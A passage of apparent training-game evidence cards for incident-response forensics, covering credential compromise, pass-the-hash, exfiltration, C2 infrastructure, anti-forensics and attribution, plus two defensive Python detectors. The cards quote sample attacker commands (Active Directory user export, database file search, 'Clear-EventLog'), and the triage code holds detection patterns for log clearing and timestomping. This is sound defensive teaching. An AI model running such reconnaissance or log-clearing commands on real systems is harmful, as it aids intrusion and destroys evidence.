║ What It Reveals: ║
║ - Credential compromise (credentials being used by attacker) ║
║ - Privilege level compromised (admin account) ║
║ - Lateral movement likely (attacker on network now) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Log entry with timestamp and source ║
║ - Digitally signed event log ║
║ - Corroborated by other log sources ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-01: Event Log Analysis shows unusual logon event ║
║ - LOG-02: Correlation across multiple systems ║
║ - TIMELINE-01: Used to establish attack progression ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Admin account was compromised. Questions to answer: ║
║ - When was the password changed? (before or after login?) ║
║ - What other logins occurred after this? (lateral movement) ║
║ - Was there any password reset? (attacker covering tracks) ║
║ - What systems did this account access? (scope of compromise)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (clear escalation point) ║
║ - Timeline: +25% (login timestamp anchors timeline) ║
║ - Attribution: +10% (geolocation may hint at attacker origin) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement MFA on admin accounts" ║
║ → NETWORK BUILDING: "Isolate admin access to PAW" ║
║ → AUDIT: "Review admin account access controls and logging" ║
╚════════════════════════════════════════════════════════════════╝
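An added example, not from the game materials: the four suspicious characteristics listed on this card turned into a small detector run over constructed log lines, one of which mirrors the card's own example entry (Administrator, 192.0.2.100, RDP, 03:22). The key=value line layout, account names, IP addresses, business hours and thresholds are all assumptions made for the example.

```python
import re
from datetime import datetime, timedelta

# Constructed sample log in a simple key=value layout (assumption: this is
# not any real product's format).  Timestamps are the company's local time.
SAMPLE_LOG = """\
2024-10-14 09:05:12 user=Administrator src=10.0.4.20 geo=US proto=VPN result=success
2024-10-14 17:48:30 user=jsmith src=10.0.7.11 geo=US proto=VPN result=success
2024-10-15 03:22:15 user=Administrator src=192.0.2.100 geo=RU proto=RDP result=success
2024-10-15 03:22:17 user=Administrator src=192.0.2.100 geo=RU proto=RDP result=success
2024-10-15 03:22:19 user=Administrator src=192.0.2.100 geo=RU proto=RDP result=success
2024-10-15 03:22:21 user=Administrator src=192.0.2.100 geo=RU proto=RDP result=failure
2024-10-15 10:30:00 user=Administrator src=10.0.4.20 geo=US proto=VPN result=success
"""

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) user=(?P<user>\S+) src=(?P<src>\S+) "
    r"geo=(?P<geo>\S+) proto=(?P<proto>\S+) result=(?P<result>\S+)$"
)

# Site-specific baseline (assumed values for the example).
ADMIN_ACCOUNTS = {"Administrator"}
BUSINESS_HOURS = range(8, 19)       # 08:00 to 18:59 local
EXPECTED_GEOS = {"US"}
SANCTIONED_PATHS = {"VPN"}          # the only approved remote path for admins
BURST_WINDOW = timedelta(seconds=10)
BURST_COUNT = 3                     # this many admin auth events inside the window


def parse(log_text):
    """Parse well-formed lines into dicts; malformed lines are skipped here,
    though a production pipeline should count them as a health signal."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
        events.append(d)
    return events


def indicators_for(event, admin_events):
    """Return the card's suspicious characteristics present on one admin
    auth event: unusual time, unusual location, unusual source path, and
    batch processing (several events for the account within seconds)."""
    found = []
    if event["ts"].hour not in BUSINESS_HOURS:
        found.append("off-hours")
    if event["geo"] not in EXPECTED_GEOS:
        found.append("unexpected-geo")
    if event["proto"] not in SANCTIONED_PATHS:
        found.append("unsanctioned-path")
    burst = [e for e in admin_events
             if e["user"] == event["user"]
             and abs(e["ts"] - event["ts"]) <= BURST_WINDOW]
    if len(burst) >= BURST_COUNT:
        found.append("burst")
    return found


def flag_admin_logons(log_text, min_indicators=2):
    """Return (timestamp, source, result, indicators) for every admin auth
    event carrying at least min_indicators suspicious characteristics.
    Failed attempts are kept: they are part of the burst pattern."""
    events = parse(log_text)
    admin = [e for e in events if e["user"] in ADMIN_ACCOUNTS]
    flagged = []
    for e in admin:
        inds = indicators_for(e, admin)
        if len(inds) >= min_indicators:
            flagged.append((e["ts"], e["src"], e["result"], inds))
    return flagged


if __name__ == "__main__":
    for ts, src, result, inds in flag_admin_logons(SAMPLE_LOG):
        print(f"{ts}  {src:<13} {result:<8} {', '.join(inds)}")
```

The two daytime VPN logons by the same account carry no indicators at all, which is the point of scoring against a baseline rather than alerting on every admin logon.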
╔════════════════════════════════════════════════════════════════╗
║ EVD-05: LATERAL MOVEMENT (PASS-THE-HASH) ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Lateral Movement ║
║ MITRE ATT&CK: T1550 (Use Alternate Authentication Material), ║
║ T1110 (Brute Force), T1021 (Remote Services) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence that attacker used stolen password hashes to access ║
║ other systems without knowing the plaintext password. ║
║ NTLM hash reuse across systems allows lateral movement. ║
║ ║
║ What It Shows: ║
║ - Compromised account: admin-user (hash: A1B2C3D4E5F6...) ║
║ - Lateral targets: File server, database server, backup server ║
║ - Movement pattern: Sequential access across infrastructure ║
║ ║
║ What It Reveals: ║
║ - Attack sophistication (understanding Windows auth) ║
║ - Network enumeration (attacker knew what systems exist) ║
║ - Scope of compromise (multiple systems accessed) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Hash captured from memory/SAM file ║
║ - Corroborated by network logs (successful auth events) ║
║ - Can be cryptographically validated ║
║ - Admissible with supporting evidence (network logs) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-02: Cross-system log correlation shows pattern ║
║ - NET-01: Network traffic shows auth attempts ║
║ - MEM-01/MEM-02: Hash visible in memory ║
║ - DISK-01/DISK-02: SAM file contains hashes ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker used pass-the-hash technique. Next steps: ║
║ - Determine all systems accessed with this hash ║
║ - Check what actions were taken on each system ║
║ - Look for privilege escalation or data access on each system" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +25% (shows sophisticated lateral movement) ║
║ - Timeline: +15% (timestamps show movement sequence) ║
║ - Attribution: +15% (technique sophistication shows skill) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Implement Credential Guard, Mimikatz mitigations"║
║ → NETWORK BUILDING: "Network segmentation to limit lateral move"║
║ → AUDIT: "Verify controls on credential reuse prevention" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-06: DATA EXFILTRATION EVIDENCE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Exfiltration ║
║ MITRE ATT&CK: T1020 (Automated Exfiltration), T1030 (Data ║
║ Transfer Size Limits), T1048 (Exfil Over Alt ║
║ Protocol) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence of large data transfer from internal network to ║
║ external attacker-controlled destination. ║
║ ║
║ Characteristics: ║
║ - Volume: 100+ GB transferred in 6-hour window ║
║ - Timing: During non-business hours (3-8 AM) ║
║ - Destination: External IP/domain (attacker server) ║
║ - Protocol: HTTPS, FTP, or custom protocol ║
║ - Pattern: Consistent data rate (not bandwidth-throttled) ║
║ ║
║ What It Reveals: ║
║ - Scope of compromise (what was accessed) ║
║ - Attacker objective (data theft vs. ransomware) ║
║ - Attack timeline (when exfiltration occurred) ║
║ - Attacker infrastructure (location of receiving server) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Network flow logs (NetFlow, sFlow, or IDS logs) ║
║ - PCAP files with packet timestamps ║
║ - Firewall logs documenting outbound connections ║
║ - Cryptographic hashes of transferred data ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - NET-01: Network traffic analysis shows volume anomalies ║
║ - NET-02: Packet inspection shows data being transferred ║
║ - LOG-02: Firewall/proxy logs show external connections ║
║ - MALW-01: Dynamic analysis shows file staging before exfil ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Massive data exfiltration detected. Critical questions: ║
║ - Exactly which files/databases were exfiltrated? ║
║ - How many customer records are affected? ║
║ - Can we identify specific data types stolen? ║
║ - Is the data still being transferred (ongoing threat)?" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (confirms attacker objectives) ║
║ - Timeline: +20% (exfil duration/timing) ║
║ - Attribution: +10% (exfil infrastructure may be reused) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Data loss prevention (DLP) controls" ║
║ → NETWORK BUILDING: "Egress filtering, traffic inspection" ║
║ → DISASTER RECOVERY: "Breach notification scope (data volume)" ║
║ → AUDIT: "Data protection controls and encryption review" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-07: ATTACKER INFRASTRUCTURE MAP ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Infrastructure ║
║ MITRE ATT&CK: Related to C2 infrastructure and command channels║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Connected map of attacker-controlled infrastructure including ║
║ multiple domains, IP addresses, registrars, and services. ║
║ ║
║ Example Infrastructure Web: ║
║ - Primary C2: checkupdate.ru (IP: 192.0.2.45) ║
║ - Alternate C2: update-service.xyz (IP: 192.0.2.46) ║
║ - Malware hosting: files.example.net (IP: 192.0.2.47) ║
║ - Registrant: All registered via registrar.ru ║
║ - ASN: AS64512 (Ukrainian ISP network) ║
║ ║
║ What It Reveals: ║
║ - Attacker operational security (redundant infrastructure) ║
║ - Attacker resources (ISP relationships, hosting account) ║
║ - Attacker location hints (registrar, ASN, geolocation) ║
║ - Attack history (domains registered months/years earlier) ║
║ - Other campaigns (infrastructure reused for other attacks) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - WHOIS records are public but can be modified ║
║ - Historical DNS data from passive DNS services ║
║ - Correlations need cross-referencing ║
║ - Admissible with supporting evidence (traffic logs) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - THREAT-01: Threat attribution analysis connects domains ║
║ - MALW-02: Static analysis finds hardcoded backup domains ║
║ - NET-01: Network traffic shows multiple C2 attempts ║
║ - CTI research: VirusTotal, Shodan, Passive DNS services ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We've mapped attacker infrastructure. Next steps: ║
║ - Search threat intelligence databases for this infrastructure ║
║ - Look for connections to known threat groups ║
║ - Check if infrastructure used in other campaigns ║
║ - Contact registrar and hosting for takedown ║
║ - Report to ISP for blocking/monitoring" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attribution: +30% (infrastructure often linked to groups) ║
║ - Attack Chain: +15% (understanding attacker preparation) ║
║ - Timeline: +10% (infrastructure registration dates) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Block all known C2 infrastructure via firewall" ║
║ → AUDIT: "Threat intelligence integration for blocking" ║
║ → THREAT INTEL: Shareable with industry, law enforcement ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-08: ENCRYPTION KEYS RECOVERED ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: T1140 (Deobfuscate/Decode), T1552 (Unsecured ║
║ Credentials), T1074 (Data Staged) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Encryption keys recovered from memory, disk, or malware code ║
║ that allow decryption of: ║
║ - Malware traffic (C2 communications) ║
║ - Stolen data archives (what was exfiltrated) ║
║ - Attacker staging servers (accessing their infrastructure) ║
║ - Backdoor communications (understanding commands) ║
║ ║
║ Examples: ║
║ - AES-256 key found in malware binary ║
║ - RC4 key in process memory (used for C2) ║
║ - TLS certificates for backdoor listener ║
║ - Steganography keys (hidden messages in files) ║
║ ║
║ What It Reveals: ║
║ - Encryption strength (military-grade vs. basic obfuscation) ║
║ - Attacker sophistication (poor key management = careless) ║
║ - What data can be decrypted (scope of analysis) ║
║ - Backdoor capabilities (understanding command set) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Keys extracted from memory/binary must be documented ║
║ - Extraction methodology must be explained ║
║ - Cross-referencing with code/behavior confirms validity ║
║ - Admissible with supporting analysis documentation ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MEM-02: Deep memory analysis finds encryption keys ║
║ - DISK-02: File carving recovers keys from slack space ║
║ - MALW-02: Static analysis finds hardcoded keys ║
║ - MALW-01: Dynamic analysis reveals keys generated at runtime ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We recovered encryption keys! This is huge because: ║
║ - We can decrypt C2 communications (see commands sent) ║
║ - We can decrypt malware archives (understand what was stolen) ║
║ - We can access attacker staging servers (more evidence) ║
║ - We can build stronger attribution (command content)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +25% (understand full communication) ║
║ - Attribution: +20% (commands reveal attacker objectives) ║
║ - Timeline: +15% (command history shows action sequence) ║
║ - Chain of Custody: +15% (encryption is strong evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Secure key management practices" ║
║ → AUDIT: "Encryption and key management controls" ║
║ → THREAT INTEL: Keys shared with law enforcement ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-09: ATTACKER COMMAND HISTORY ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1059 (Command & Scripting Interpreter), ║
║ T1059.001 (PowerShell) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Recovered history of commands executed by attacker on ║
║ compromised systems. Shows attacker's actions, objectives, ║
║ and decision-making process. ║
║ ║
║ Examples: ║
║ - PowerShell: Get-ADUser -Filter * | Export-Csv C:\temp\ad.csv ║
║ - CMD: dir \\backup-server\share ║
║ - Bash: find / -name "*.sql" -o -name "*.db" 2>/dev/null ║
║ ║
║ What It Reveals: ║
║ - Attacker objectives (looking for what? AD users? databases?) ║
║ - Attacker knowledge (familiar with Windows/Linux/networks) ║
║ - Attack sophistication (script-kiddie vs. skilled operator) ║
║ - Targeting specificity (random exploration vs. targeted search) ║
║ - Timeline of activities (sequence of commands shows progression) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Command history from shell/terminal logs ║
║ - PowerShell transcript logs (if enabled) ║
║ - Memory forensics shows running command buffer ║
║ - Timestamps document command execution order ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MEM-02: Memory forensics finds recent command buffer ║
║ - LOG-02: Command execution logging (PowerShell, bash history) ║
║ - DISK-01: Shell history files (.bash_history, PowerShell logs)║
║ - MALW-01: Dynamic analysis shows commands sent to shell ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We have the attacker's command history! This shows us: ║
║ - What systems they were looking for ║
║ - What data they searched for ║
║ - How much time they spent on each system ║
║ - When they pivoted to new systems ║
║ - When they started exfiltration ║
║ - If they set up backdoors or persistence" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Timeline: +25% (command timing shows exact sequence) ║
║ - Attack Chain: +25% (command progression shows phases) ║
║ - Attribution: +15% (command style/language hints) ║
║ - Chain of Custody: +10% (strong admissible evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "PowerShell transcript logging, command audit" ║
║ → AUDIT: "Verify logging of command execution" ║
║ → TRAINING: "Identify what commands should have triggered alerts"║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-10: MALWARE BEHAVIOR PROFILE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Malware & Persistence ║
║ MITRE ATT&CK: Multiple TTPs based on observed behavior ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Complete profile of malware capabilities and behavior based ║
║ on dynamic analysis in sandbox environment. ║
║ ║
║ Profile Contents: ║
║ - File system interactions (creates, modifies, deletes) ║
║ - Registry modifications (persistence mechanisms) ║
║ - Process creation (parent-child relationships) ║
║ - Network communications (DNS queries, HTTP requests, IPs) ║
║ - API calls (Windows/Linux API usage) ║
║ - Anti-analysis techniques (sandbox evasion) ║
║ ║
║ Example Output: ║
║ - Name: conhost.exe (masquerading as Windows process) ║
║ - Creates files: C:\Users\*\AppData\Local\Temp\app.exe ║
║ - Registry: HKLM\Software\Microsoft\Windows\CurrentVersion\Run ║
║ (persistence) ║
║ - Network: Connects to update.badsite.ru:443 every 15 minutes ║
║ - Capabilities: Credential harvesting, File encryption, C2 ║
║ ║
║ What It Reveals: ║
║ - Complete malware capabilities ║
║ - Attacker operational techniques ║
║ - Threat level (spyware vs. ransomware vs. trojan) ║
║ - Indicators of Compromise (IOCs) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - Sandbox execution video/logs document behavior ║
║ - Timestamps and sequence recorded ║
║ - Reproducible analysis methodology ║
║ - Widely accepted malware analysis evidence ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - MALW-01: Dynamic sandbox analysis produces full profile ║
║ - MALW-02: Static analysis validates observed behaviors ║
║ - Combined: Behavior validated against code confirms accuracy ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "We have the complete malware profile. Now we can: ║
║ - Search for all instances of this malware ║
║ - Hunt for C2 communications on network ║
║ - Search for created files and artifacts ║
║ - Link to other malware families (code similarities)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +20% (understand capabilities = understand threat)║
║ - Attribution: +15% (malware signatures match known families) ║
║ - Timeline: +10% (behavior timing shows operation phase) ║
║ - Chain of Custody: +10% (sandbox logs are strong evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Controls to prevent malware execution" ║
║ → NETWORK BUILDING: "Detection of malware C2 behaviors" ║
║ → AUDIT: "EDR/SIEM coverage for malware detection" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-11: FILE STAGING ARTIFACTS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1074 (Data Staged), T1005 (Data from Local ║
║ System) ║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence of attacker staging files before exfiltration. Files ║
║ are collected in a temporary location, compressed, encrypted, ║
║ then transferred to attacker server. ║
║ ║
║ Artifacts Found: ║
║ - Compressed archives (RAR, 7z, ZIP files) ║
║ - Partially deleted files (overwrite artifacts) ║
║ - File lists (text files naming what to steal) ║
║ - Batch scripts (automated collection scripts) ║
║ - Temporary directories with suspicious contents ║
║ ║
║ Example: ║
║ - C:\Staging\data_backup.7z (500 MB) ║
║ - C:\Staging\files_to_get.txt (list of target files) ║
║ - C:\Staging\collect.bat (automated collection script) ║
║ ║
║ What It Reveals: ║
║ - Data that was targeted (from .txt lists) ║
║ - Volume of exfiltration (archive size) ║
║ - Compression ratio (how much data actually stolen) ║
║ - Attacker knowledge (knew where sensitive data was) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: STRONG ✓ ║
║ - File hashes document the staging ║
║ - File timestamps show staging timeline ║
║ - File content confirms what was staged ║
║ - Fully admissible in court ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - DISK-01/DISK-02: Staging artifacts on disk ║
║ - LOG-02: Batch script execution in logs ║
║ - MALW-01: Dynamic analysis shows staging process ║
║ - NET-01: File transfer evidence (connection to staging dir) ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker staged specific files. This shows: ║
║ - Exact data that was targeted (from staging lists) ║
║ - Attack planning (targeted vs. random) ║
║ - Data sensitivity (what did they prioritize) ║
║ - Precision of attack (narrow vs. broad data grab)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attack Chain: +15% (staging phase evidence) ║
║ - Timeline: +20% (staging timestamps show prep phase) ║
║ - Attribution: +10% (precision shows targeting sophistication) ║
║ - Chain of Custody: +10% (file evidence is strong) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Data identification and protection (DLP)" ║
║ → AUDIT: "Data classification and access controls" ║
║ → NOTIFICATION: "Specific data breach notification" ║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ EVD-12: ANTI-FORENSICS EVIDENCE ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Attack Activity ║
║ MITRE ATT&CK: T1070 (Indicator Removal), T1485 (Data ║
║ Destruction), T1556 (Modify Authentication Process)║
╠════════════════════════════════════════════════════════════════╣
║ DESCRIPTION: ║
║ Evidence that attacker actively tried to cover their tracks ║
║ using anti-forensics techniques. ║
║ ║
║ Anti-Forensics Found: ║
║ - Event log deletion (Clear-EventLog PowerShell) ║
║ - File timestamp manipulation (TimeStomp) ║
║ - Log overwriting (dd commands filling logs) ║
║ - File shredding (secure deletion of evidence) ║
║ - Registry clearing (CleanMgr, CCleaner, etc.) ║
║ - Malware self-deletion after execution ║
║ ║
║ What It Reveals: ║
║ - Sophistication (advanced attackers use anti-forensics) ║
║ - Awareness (attacker knew forensics would be used) ║
║ - Intent (intentional cover-up vs. accidental trail) ║
║ - What they're hiding (deleted logs = they knew activities ║
║ would be suspicious) ║
║ - Attack planning (anti-forensics in playbook = pre-planned) ║
╠════════════════════════════════════════════════════════════════╣
║ Chain of Custody: MODERATE ⚠ ║
║ - Evidence is lack of evidence (absences are hard to prove) ║
║ - Comparison with known baselines shows anomalies ║
║ - Log deletion tools detected and documented ║
║ - Admissible with supporting context (other evidence) ║
╠════════════════════════════════════════════════════════════════╣
║ Discovery Source: ║
║ - LOG-01/LOG-02: Gaps in logs (suspicious absences) ║
║ - DISK-01/DISK-02: Deleted log files, anti-forensic tools ║
║ - MEM-01/MEM-02: Anti-forensic process running in memory ║
║ - MALW-01: Dynamic analysis shows self-deletion ║
║ - MALW-02: Code analysis finds anti-forensic capabilities ║
╠════════════════════════════════════════════════════════════════╣
║ Investigative Lead: ║
║ "Attacker used anti-forensics. This actually helps because: ║
║ - Proves attacker sophistication (means skilled opponent) ║
║ - Indicates intentional harm (not accidental) ║
║ - Suggests what they're hiding (what logs were deleted?) ║
║ - Helps attribution (anti-forensics technique is signature) ║
║ - Can reconstruct from other sources (memory, network logs)" ║
╠════════════════════════════════════════════════════════════════╣
║ Impact on Progress Meters: ║
║ - Attribution: +20% (anti-forensic technique is signature) ║
║ - Attack Chain: +10% (shows post-attack phase) ║
║ - Timeline: -10% (anti-forensics makes timeline harder) ║
║ - Chain of Custody: +5% (proves intentional cover-up) ║
╠════════════════════════════════════════════════════════════════╣
║ Feeds Into Modules: ║
║ → HARDENING: "Immutable logging (cloud, WORM storage)" ║
║ → NETWORK BUILDING: "Centralized log aggregation" ║
║ → AUDIT: "Log integrity and anti-tampering controls" ║
╚════════════════════════════════════════════════════════════════╝
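The EVD-09 card (attacker command history) and the EVD-12 card (anti-forensics) both turn on the same question: what does a recovered command history tell the investigator, and which commands should have raised an alert? The following is an added example, not part of the Incident Zero materials, showing a defender-side triage of such a history: it tags each command with the intent category and ATT&CK technique it suggests, records the order in which hosts first appear (the pivot sequence EVD-09 asks for), and extracts which event logs a clearing command targeted (EVD-12's "what logs were deleted?"). The sample history, host names and rule patterns are constructed for illustration; the technique IDs are standard MITRE ATT&CK identifiers.

```python
"""Triage of a recovered attacker command history (EVD-09) that also flags
anti-forensics commands (EVD-12).  Added example for the Incident Zero
evidence cards, not part of the game's own materials; the history below,
the host names and the rule patterns are constructed for illustration."""
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample history, one command per line:
# "<timestamp> <host> <shell> <command>"
SAMPLE_HISTORY = r"""
2025-10-03 09:12:44 WS-017 powershell Get-ADUser -Filter * | Export-Csv C:\temp\ad.csv
2025-10-03 09:31:02 WS-017 cmd dir \\backup-server\share
2025-10-03 11:05:19 BACKUP-SRV bash find / -name "*.sql" -o -name "*.db" 2>/dev/null
2025-10-03 11:22:08 WS-017 cmd 7z a C:\Staging\data_backup.7z C:\Finance\*.xlsx
2025-10-03 11:40:57 WS-017 powershell Clear-EventLog -LogName Security
"""

# (category, ATT&CK technique, pattern).  Technique IDs are standard MITRE
# ATT&CK identifiers; the patterns are illustrative, not a complete ruleset.
RULES = [
    ("discovery",      "T1087.002", re.compile(r"\bget-aduser\b", re.I)),
    ("discovery",      "T1135",     re.compile(r"\bdir\s+\\\\\S+\\\S+|\bnet\s+view\b", re.I)),
    ("discovery",      "T1083",     re.compile(r"\bfind\s+/.*-name\b", re.I)),
    ("staging",        "T1074.001", re.compile(r"\\Staging\\", re.I)),
    ("anti-forensics", "T1070.001", re.compile(r"\bclear-eventlog\b|\bwevtutil\s+cl\b", re.I)),
    ("anti-forensics", "T1070.006", re.compile(r"timestomp|\.lastwritetime\s*=", re.I)),
]

CLEARED_LOG_RE = re.compile(r"(?:clear-eventlog\s+-logname\s+|wevtutil\s+cl\s+)(\S+)", re.I)
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (.*)$")


@dataclass
class Event:
    ts: datetime
    host: str
    shell: str
    cmd: str


def parse_history(text):
    """Parse history lines; lines that do not fit the format are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        events.append(Event(ts, m.group(2), m.group(3), m.group(4)))
    return sorted(events, key=lambda e: e.ts)  # timeline order, not file order


def classify(cmd):
    """All (category, technique) pairs whose pattern matches the command."""
    return [(cat, tid) for cat, tid, rx in RULES if rx.search(cmd)]


def cleared_logs(events):
    """Names of event logs targeted by a log-clearing command."""
    names = []
    for ev in events:
        m = CLEARED_LOG_RE.search(ev.cmd)
        if m:
            names.append(m.group(1))
    return names


def triage(events):
    """Flagged commands in timeline order, the order in which hosts first
    appear (the pivot sequence), and which logs were cleared."""
    first_seen, flagged = {}, []
    for ev in events:
        first_seen.setdefault(ev.host, ev.ts)
        hits = classify(ev.cmd)
        if hits:
            flagged.append({"ts": ev.ts.isoformat(sep=" "), "host": ev.host,
                            "hits": hits, "cmd": ev.cmd})
    return {"flagged": flagged,
            "pivot_order": sorted(first_seen, key=first_seen.get),
            "cleared_logs": cleared_logs(events)}


if __name__ == "__main__":
    report = triage(parse_history(SAMPLE_HISTORY))
    print("Pivot order:", " -> ".join(report["pivot_order"]))
    for f in report["flagged"]:
        tags = ", ".join(f"{c}/{t}" for c, t in f["hits"])
        print(f"{f['ts']} {f['host']:<10} [{tags}] {f['cmd']}")
    print("Logs cleared:", report["cleared_logs"])
```

Run stand-alone it prints the pivot order (WS-017, then BACKUP-SRV), one tagged line per flagged command, and the cleared log name; in a real engagement the same structure would be fed from PowerShell transcripts, `.bash_history` files or a memory-carved command buffer, which is exactly the EVD-09 "Discovery Source" list.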
These are synthesis cards representing conclusions from forensic findings:
╔════════════════════════════════════════════════════════════════╗
║ FIND-01: THREAT ATTRIBUTION REPORT ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Attribution Confidence ≥ 70% ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Attack attributed to [Threat Group Name] ║
║ Confidence Level: [60-90% based on evidence] ║
║ Associated Techniques: [MITRE ATT&CK TTPs] ║
║ Previous Targets: [Industries/organizations previously targeted]║
║ Likely Motivation: [Financial gain, espionage, etc] ║
║ ║
║ RECOMMENDATIONS: ║
║ 1. Notify law enforcement (FBI, Interpol if international) ║
║ 2. Share intelligence with industry ISACs ║
║ 3. Monitor for indicators of re-engagement ║
║ 4. Implement defenses targeting group's known TTPs ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Defense-in-depth against attributed group" ║
║ → AUDIT & COMPLIANCE: "Threat model update with attributed group"║
║ → INCIDENT RESPONSE: "Playbook for future incidents from group"║
╚════════════════════════════════════════════════════════════════╝
╔════════════════════════════════════════════════════════════════╗
║ FIND-02: ATTACK SURFACE ANALYSIS ║
╠════════════════════════════════════════════════════════════════╣
║ Type: Findings/Conclusions ║
║ Triggered When: Attack Chain ≥ 75% ║
╠════════════════════════════════════════════════════════════════╣
║ FINDING: ║
║ Entry Point: [Method used for initial compromise] ║
║ Exploited Vulnerability: [CVE, weak auth, configuration gap] ║
║ Escalation Point: [Where privilege escalation occurred] ║
║ Lateral Movement Paths: [Systems accessed after pivot] ║
║ ║
║ ROOT CAUSE: ║
║ - [Patch missing, configuration weakness, process gap] ║
║ ║
║ RECOMMENDATIONS: ║
║ 1. Patch entry-point vulnerability immediately ║
║ 2. Implement detection for exploitation attempts ║
║ 3. Restrict lateral movement (network segmentation) ║
║ 4. Update architecture to prevent this attack path ║
║ ║
║ FEEDS INTO MODULES: ║
║ → HARDENING: "Specific technical hardening measures" ║
║ → NETWORK BUILDING: "Architecture redesign to block attack path"║
